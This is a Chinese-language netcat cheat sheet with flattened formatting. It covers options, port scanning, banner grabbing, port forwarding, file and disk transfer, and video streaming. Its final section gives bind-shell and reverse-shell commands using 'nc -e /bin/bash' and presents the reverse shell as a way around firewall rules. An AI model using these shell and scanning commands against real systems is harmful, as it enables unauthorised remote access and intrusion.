用法連接到位于任何地方的主機$ nc [options] [host] [port]監聽傳入連接$ nc -lp port [host] [port]選項示例-hnc -h幫助-znc -z 192.168.1.9 1-100端口掃描主機或 IP 地址-vnc -zv 192.168.1.9 1-100提供詳細輸出-nnc -zn 192.168.1.9 1-100通過禁用 DNS 解析進行快速掃描-lnc -lp 8000TCP 偵聽模式 (用于入站連接)-wnc -w 180 192.168.1.9 8000定義超時值-knc -kl 8000斷線后繼續收聽-unc -u 192.168.1.9 8000使用 UDP 而不是 TCP-qnc -q 1 192.168.1.9 8000客戶在 EOF 后熬夜-4nc -4 -l 8000僅限 IPv4-6nc -6 -l 8000僅限 IPv6聊天客戶端-服務器服務器 Server (192.168.1.9)$ nc -lv 8000客戶端 Client$ nc 192.168.1.9 8000Netcat 示例Banner 抓取$ nc website.com 80GET index.html HTTP/1.1HEAD / HTTP/1.1或者echo "" | nc -zv -wl 192.168.1.1 801-805端口掃描掃描 21 到 25 之間的端口$ nc -zvn 192.168.1.1 21-25掃描端口 22、3306 和 8080$ nc -zvn 192.168.1.1 22 3306 8080代理和端口轉發$ nc -lp 8001 -c "nc 127.0.0.1 8000"或者$ nc -l 8001 | nc 127.0.0.1 8000創建從一個本地端口到另一個本地端口的隧道下載文件服務器 Server (192.168.1.9)$ nc -lv 8000 $ nc -nv 192.168.1.9 8000 > file.txt假設您想將文件 file.txt 從服務器 A 傳輸到客戶端 B。上傳文件服務器 Server (192.168.1.9)$ nc -lv 8000 > file.txt客戶端 Client$ nc 192.168.1.9 8000 目錄傳輸服務器 Server (192.168.1.9)$ tar -cvf – dir_name | nc -l 8000客戶端 Client$ nc -n 192.168.1.9 8000 | tar -xvf -假設您想通過網絡將目錄從 A 傳輸到 B加密傳輸服務器 Server (192.168.1.9)$ nc -l 8000 | openssl enc -d -des3 -pass pass:password > file.txt客戶端 Client$ openssl enc -des3 -pass pass:password | nc 192.168.1.9 8000在通過網絡傳輸之前加密數據克隆服務器 Server (192.168.1.9)$ dd if=/dev/sda | nc -l 8000客戶端 Client$ nc -n 192.168.1.9 8000 | dd of=/dev/sda克隆 linux PC 非常簡單。假設你的系統盤是 /dev/sda視頻流服務器 Server (192.168.1.9)$ cat video.avi | nc -l 8000客戶端 Client$ nc 192.168.1.9 8000 | mplayer -vo x11 -cache 3000 -使用 netcat 流式傳輸視頻遠程 shell服務器 Server (192.168.1.9)$ nc -lv 8000 -e /bin/bash客戶端 Client$ nc 192.168.1.9 8000我們已經使用 telnet 和 ssh 使用遠程 Shell，但是如果它們沒有安裝并且我們沒有安裝它們的權限，那么我們也可以使用 netcat 創建遠程 shell逆轉 shell服務器 Server (192.168.1.9)$ nc -lv 8000客戶端 Client$ nc 192.168.1.9 8000 -v -e /bin/bash反向 shell 通常用于繞過防火墻限制，例如阻止入站連接